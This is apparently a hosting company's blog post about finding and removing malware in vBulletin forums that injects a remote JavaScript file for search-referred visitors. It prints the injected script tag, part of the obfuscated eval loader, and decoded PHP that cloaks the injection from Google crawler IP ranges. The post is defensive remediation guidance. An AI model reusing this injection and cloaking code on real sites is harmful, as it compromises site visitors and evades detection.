Cleaning up vBulletin Script Injections

Cleaning up vBulletin Script Injections
We’ve run across this hard to find script a few times in the past few weeks. The script set conditions around specific referrers and user-agents. While it’s hard to find, the fix is simple.

It happens like this: a user comes to the forum from a Google search page (SERP) and they are greeted with this payload:
<script type=”text/javascript” src=”http://www.pixxxxoons.org/ijr.js

The script loaded to vBulletin’s headinclude. Now for the fun part- a search of the files did not find it. A Database restore won’t fix it and searching terms representative of encoded values – eval, base_64, etc.. came up blank too.

What happens is the malware rewrites the theme code itself, making detection difficult. We realized this was happening after finding that the site wasn’t responding to two scripts in the headinclude.

The fix is straightforward: the malware installs a plugin “vBulletin_hooks” and loads it globally. All that’s needed is to remove the plugin, reset datastores, and you are done.

If you’re a bit curious and want to check the entire process, start with checking inside the database.

Using PHPMyAdmin, search the entire database for %eval%”.

That search should bring up several entries. We started with the datastore table (“eval” strings there load with the template), and there, we found this looking a bit odd:

$xhTuAS = “\x62?.”\x61?.”\x73?.”\x65?.@eval($xhTuAS(“DQpmdW5jdGlvbiBISGhwZ0h..
zY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiIHNyYz1cImh0dHA6Ly93d3cucGlzZXptYWt..
+PC9zY3JpcHQ+Iiwkb3V0cHV0KSk7DQp9DQpmdW5jdGlvbiB4ZnJFbHVhKCkgew0KaWYocHJlZ”));

After decoding, we found that it was up to this:

function HHhpgHoev($output) {
$find_me = ‘connection-min.js?v=387?>’;
return ($output = str_replace($find_me,$find_me.”\r\n<script type=\”text/javascript\”
src=\”http://www.pisezmakoons.org/ijr.js? “,$output));
}
function xfrElua() {
if(preg_match(‘#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|…
‘,$_SERVER[‘HTTP_REFERER’])) {
if(preg_match(‘#msie|myie|ie|firefox|opera|media center#i’,$_SERVER[‘HTTP_USER_AGENT’])) return true;
}
}
function kOBFvnrcO() {
$a = array(‘216.239.’,’209.85.’,’173.255.’,’173.194.’,’89.207.’,’74.125.’,…’);
foreach($a as $b) {
if(preg_match(“/^$b/i”,$_SERVER[‘REMOTE_ADDR’])) return true;
}
}
if(!empty($_SERVER[‘HTTP_REFERER’])) {
if(xfrElua() and !kOBFvnrcO()) {
$output = HHhpgHoev($output);
}
}

You know the rest – a lot of work. Luckily, the fix was easy.

You know your site has the infection if you Google it, click on it from the Google search page, and it takes you back to the Google home page.

At URLJet, we offer professional, reliable managed forum hosting for some of the worlds largest forums, including fortune 500 companies and even professional sports teams. vBulletin is all we do, all day, everyday. Trust the vBulletin experts at URLJet to host your vBulletin forum. We guarantee we can run your forum faster, better, and more reliable than anyone… PERIOD! Email us at sales@urljet.com to get started!

default
Post Written by

0 Comments

Leave A Reply


CommentLuv badge

%d bloggers like this: